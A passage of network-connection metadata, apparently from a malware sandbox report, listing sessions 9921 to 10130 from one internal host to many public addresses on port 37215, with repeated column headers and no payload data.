                                                  9921192.168.2.134946280.1.86.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9922192.168.2.1357532157.4.233.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9923192.168.2.134970441.189.172.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9924192.168.2.1340020157.211.115.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9925192.168.2.1346674197.252.138.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9926192.168.2.1342388157.28.18.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9927192.168.2.135355041.129.30.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9928192.168.2.1344810157.130.243.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9929192.168.2.1358050197.156.191.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9930192.168.2.1347654197.249.246.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9931192.168.2.13601949.217.209.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9932192.168.2.1342370197.206.231.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9933192.168.2.133461841.134.177.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9934192.168.2.1356458157.82.5.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9935192.168.2.135384441.104.29.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9936192.168.2.1337034197.54.203.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9937192.168.2.1353716157.237.13.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9938192.168.2.134109641.99.187.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9939192.168.2.1351802157.193.117.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9940192.168.2.133683641.253.149.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9941192.168.2.134581438.2.225.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9942192.168.2.1341154166.155.250.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9943192.168.2.1334196197.8.63.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9944192.168.2.134199485.22.249.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9945192.168.2.1356982106.8.143.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9946192.168.2.136049075.150.58.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9947192.168.2.135684441.169.198.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9948192.168.2.1338370197.154.225.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9949192.168.2.1334136157.212.123.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9950192.168.2.134533841.124.199.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9951192.168.2.133332841.1.198.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9952192.168.2.1346840111.165.71.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9953192.168.2.1356154157.205.3.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9954192.168.2.1340130166.222.155.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9955192.168.2.1350902134.57.243.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9956192.168.2.1344968113.200.107.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9957192.168.2.134161841.243.114.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9958192.168.2.1337658157.121.80.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9959192.168.2.135628441.199.228.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9960192.168.2.1352782157.96.22.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9961192.168.2.134527041.100.89.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9962192.168.2.1348116113.240.105.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9963192.168.2.135169241.19.192.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9964192.168.2.1350846157.180.227.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9965192.168.2.135628241.24.191.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9966192.168.2.133994658.204.217.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9967192.168.2.1337154197.187.109.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9968192.168.2.1340404157.153.97.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9969192.168.2.1333074197.34.218.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9970192.168.2.1342662157.106.178.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9971192.168.2.1341198197.110.240.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9972192.168.2.135758897.255.251.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9973192.168.2.135604241.19.138.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9974192.168.2.1343798157.215.76.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9975192.168.2.133497041.152.145.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9976192.168.2.1346220197.100.127.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9977192.168.2.133872441.91.243.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9978192.168.2.1358626157.212.231.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9979192.168.2.134179241.245.150.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9980192.168.2.1355480197.211.10.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9981192.168.2.1360520197.195.244.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9982192.168.2.1334066197.142.166.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9983192.168.2.1345956157.24.127.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9984192.168.2.135413251.210.249.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9985192.168.2.1349260106.249.205.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9986192.168.2.134168041.86.9.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9987192.168.2.134821241.179.120.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9988192.168.2.1353728157.147.163.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9989192.168.2.1358618157.176.111.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9990192.168.2.133723241.188.87.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9991192.168.2.1336656148.181.198.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9992192.168.2.135293641.134.187.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9993192.168.2.135007846.19.71.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9994192.168.2.136016461.202.17.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9995192.168.2.134697036.74.83.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9996192.168.2.1354174157.73.51.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9997192.168.2.1359354197.190.133.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9998192.168.2.1348548197.247.160.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9999192.168.2.1345560197.167.35.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10000192.168.2.135354632.51.79.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10001192.168.2.135520241.6.51.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10002192.168.2.1357616157.27.190.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10003192.168.2.1341970197.160.55.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10004192.168.2.134169241.210.28.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10005192.168.2.134597841.101.112.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10006192.168.2.135483841.171.251.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10007192.168.2.1341228197.229.50.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10008192.168.2.1342130213.112.140.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10009192.168.2.1354822161.73.40.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10010192.168.2.135881841.9.8.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10011192.168.2.1340802197.235.196.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10012192.168.2.1350146197.67.245.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10013192.168.2.1358310206.93.18.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10014192.168.2.1345704197.146.43.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10015192.168.2.1341730163.198.205.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10016192.168.2.135726241.126.128.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10017192.168.2.134776841.195.41.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10018192.168.2.1353008157.22.194.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10019192.168.2.1358098197.86.130.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10020192.168.2.133650841.36.159.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10021192.168.2.1344942207.11.50.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10022192.168.2.1339750151.129.29.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10023192.168.2.134116641.186.41.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10024192.168.2.133723841.158.184.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10025192.168.2.1340146157.215.181.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10026192.168.2.135349872.229.184.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10027192.168.2.1358368197.248.205.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10028192.168.2.1353142149.237.182.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10029192.168.2.1348986157.81.68.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10030192.168.2.1353378203.110.139.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10031192.168.2.1353642157.217.156.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10032192.168.2.1338824197.22.110.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10033192.168.2.133973446.37.37.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10034192.168.2.1333138196.134.146.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10035192.168.2.1354986197.71.198.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10036192.168.2.1334926107.99.43.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10037192.168.2.134010441.237.143.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10038192.168.2.1356448143.14.239.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10039192.168.2.135893241.135.91.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10040192.168.2.1337558157.191.121.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10041192.168.2.1352456157.124.187.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10042192.168.2.1345006157.213.145.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10043192.168.2.1356954217.123.206.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10044192.168.2.135581241.158.247.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10045192.168.2.1347914197.197.188.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10046192.168.2.133657089.130.18.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10047192.168.2.1340460155.197.215.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10048192.168.2.135388277.169.8.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10049192.168.2.1357082157.181.71.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10050192.168.2.1339298157.157.121.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10051192.168.2.1355326157.246.165.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10052192.168.2.1337254157.119.128.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10053192.168.2.1347408197.95.23.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10054192.168.2.1360832197.131.116.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10055192.168.2.1339610218.223.9.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10056192.168.2.135893041.40.5.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10057192.168.2.1333078157.102.8.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10058192.168.2.1338386197.190.81.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10059192.168.2.1339142197.35.135.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10060192.168.2.134847841.11.131.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10061192.168.2.1340130108.109.78.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10062192.168.2.1355180157.233.99.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10063192.168.2.133537641.128.231.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10064192.168.2.1337510197.30.213.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10065192.168.2.1353440197.136.177.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10066192.168.2.1344446170.166.173.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10067192.168.2.1342228197.20.8.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10068192.168.2.135891435.142.80.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10069192.168.2.1335678157.89.37.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10070192.168.2.135388241.9.131.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10071192.168.2.133965041.148.240.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10072192.168.2.1343386197.24.107.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10073192.168.2.1344316197.248.185.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10074192.168.2.1344990157.94.81.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10075192.168.2.1350014157.203.74.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10076192.168.2.134958241.181.0.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10077192.168.2.1345854197.115.206.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10078192.168.2.1334844197.242.150.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10079192.168.2.1337150197.162.242.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10080192.168.2.1342320197.186.50.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10081192.168.2.1360702223.16.135.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10082192.168.2.1357418157.17.80.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10083192.168.2.1339362157.248.185.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10084192.168.2.1338290157.90.64.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10085192.168.2.136025441.52.63.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10086192.168.2.1343000157.79.92.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10087192.168.2.1359558157.148.96.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10088192.168.2.1359372219.176.164.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10089192.168.2.1349202197.179.60.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10090192.168.2.1351726157.41.132.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10091192.168.2.134551241.0.77.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10092192.168.2.1356542157.169.61.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10093192.168.2.1346174213.128.1.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10094192.168.2.135097241.208.41.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10095192.168.2.1333844119.249.196.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10096192.168.2.135130646.49.16.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10097192.168.2.134423441.164.200.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10098192.168.2.133679241.38.223.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10099192.168.2.133526258.30.222.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10100192.168.2.1332992101.167.36.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10101192.168.2.1341730147.131.112.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10102192.168.2.133832865.190.99.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10103192.168.2.1333102197.175.87.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10104192.168.2.1358990197.40.229.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10105192.168.2.1348094159.69.170.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10106192.168.2.134325041.217.238.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10107192.168.2.1358896157.183.58.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10108192.168.2.133989241.225.241.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10109192.168.2.1355218197.87.237.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10110192.168.2.1350680197.154.0.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10111192.168.2.13387808.78.104.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10112192.168.2.13331421.228.98.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10113192.168.2.1337740175.99.177.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10114192.168.2.133498887.20.160.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10115192.168.2.1356712126.181.114.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10116192.168.2.1344782217.68.140.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10117192.168.2.1352234204.156.50.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10118192.168.2.1343124157.5.74.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10119192.168.2.1358048157.89.13.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10120192.168.2.1335444157.166.63.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10121192.168.2.1334936154.147.89.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10122192.168.2.1337694197.219.205.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10123192.168.2.1360460157.7.210.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10124192.168.2.1349488197.127.100.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10125192.168.2.1347112197.198.35.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10126192.168.2.133687241.231.108.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10127192.168.2.1356936125.187.19.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10128192.168.2.1334320157.12.0.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10129192.168.2.1349360197.169.110.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10130192.168.2.135449434.95.190.25237215
